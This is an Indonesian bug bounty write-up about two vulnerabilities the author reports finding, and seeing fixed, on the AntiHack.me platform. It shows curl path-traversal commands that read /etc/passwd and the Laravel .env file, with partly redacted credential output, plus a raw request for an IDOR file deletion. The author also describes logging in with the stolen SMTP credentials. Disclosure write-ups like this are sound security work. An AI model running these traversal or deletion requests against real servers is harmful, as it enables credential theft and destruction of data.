---
layout: post
title: How I Found and Reporting Vulnerabilities to AntiHack.me
date: 2019-01-09 13:37:00 PM
permalink: /project/2019-01-09-antihack-me-multiple-vulnerabilities/
author: xhellc0de
categories: [ pentesting, idor, lfd ]
tags: vulnerability
comments: true
image: /images/antihack_banner.png
---
![AntiHack.me](/images/antihack_banner.png)

**ABSTRACT**

AntiHack.me merupakan sebuah situs _Bug Bounty Platform_ asal Singapura. Melihat _Platform_ ini cukup dikenal, maka saya memutuskan untuk membuat akun disana. Setelah berhasil membuat akun, user akan diberikan informasi terkait _Bug Bounty Program_ yang terdapat di AntiHack, dan situs AntiHack sendiri masuk kedalam program tersebut.

**VULNERABILITY I (Local File Disclosure)**

Ketika mengakses laman https://www.antihack.me/blog, website akan menampilkan _Popup Modal_ yang berisi ajakan untuk ikut berlangganan AntiHack Magazine, yaitu sebuah E-Zine yang dibuat oleh mereka. Prosesnya dengan memasukan beberapa informasi pada field yang disediakan, lalu menekan tombol Submit. Setelah tombol Submit ditekan, user akan diarahkan ke link untuk mendownload E-Zine tersebut.
Berikut bentuk link nya:

```
https://www.antihack.me/filedownload.php?file=AntiHACKJan19Issue.pdf
```

Dari struktur tersebut, dapat dilihat banwa file **filedownload.php** kemungkinan memiliki kerentanan Local File Disclosure, dimana dengan memanfaatkan file ini, kita dapat men-download file-file sensitif yang ada pada server.
Percobaan pun dilakukan dengan bantuan curl.

```
[root@xhellc0de ~]# curl https://www.antihack.me/filedownload.php?file=../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
[ redacted ]

```

Dapat dilihat banwa benar file **filedownload.php** memiliki kerentanan sehingga kita dapat men-download file yang ada di server.
Karena website AntiHack.me menggunakan Laravel, maka saya mencoba untuk memperoleh file config nya yaitu pada file .env

```
[root@xhellc0de ~]# curl https://www.antihack.me/filedownload.php?file=../../../../var/www/html/.env

[ redacted ]
DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=antihack
DB_USERNAME=antihack
DB_PASSWORD=
[ redacted ]

MAIL_DRIVER=smtp
MAIL_HOST=smtp.zoho.com
MAIL_PORT=465
MAIL_USERNAME=admin@antihack.me
MAIL_PASSWORD=[ redacted ]
MAIL_ENCRYPTION=ssl
[ redacted ]
```

Dari informasi tersebut, kita memperoleh informasi sensitif seperti user dan password database. Bahkan terdapat user dan password SMTP yang digunakan.
Saya mencoba login menggunakan user dan password SMTP yang diperoleh dan ternyata berhasil, hehe.

![Zoho Panel](/images/antihack_zohopanel.png)

**VULNERABILITY II (IDOR Delete Any File on AntiHack.me Server)**

Seperti pada website _Bug Bounty_ pada umumnya, terdapat sebuah fitur untuk melakukan reporting terkait vulnerability yang ditemukan. Tidak lupa pula terdapat fitur _attach file_ untuk menambah file gambar atau video untuk melengkapi report yang kita kirimkan.
Ketika kita selelai melakukan _upload file_ pada form report, muncul sebuah tombol X yang berfungsi untuk menghapus file yang baru saja diupload, fungsi nya tentu saja untuk menghapus file bila kita salah meng-upload file report.

![Remove Button](/images/antihack_removebutton.png)

Ketika tombol tersebut diklik, berikut proses yang berjalan:

```
POST /php/ajax_remove_file.php HTTP/1.1
Host: www.antihack.me
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.antihack.me/hacker_inbox
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Cookie: [ redacted ]
Connection: close

file=asu.png
```

Sayangnya tidak diterapkan validasi file apa saja yang boleh dihapus. Dengan memanipulasi nilai dari parameter **file** kita dapat menghapus file apapun yang terdapat pada server AntiHack.me.

Untuk lebih jelasnya, silahkan lihat GIF berikut:

![Remove](/images/antihack_me_remove.gif)

Pada percobaanya saya mencoba menghapus file dengan beberapa ekstensi berbeda, namun tidak mencoba untuk menghapus file yang berada di luar folder website karna khawatir akan mengganggu bahkan merusak website tersebut.

Itulah beberapa vulnerability yang berhasil ditemukan pada website AntiHack.me. Saat ini semua vulnerability tersebut sudah diperbaiki oleh pihak AntiHack.me.


**Timeline**

```
2019-01-03: Bug reported
2019-01-04: Triaged
2019-01-06: Bug Fixed
2019-01-09: Report Resolved
2019-01-09: Swag Rewarded
```
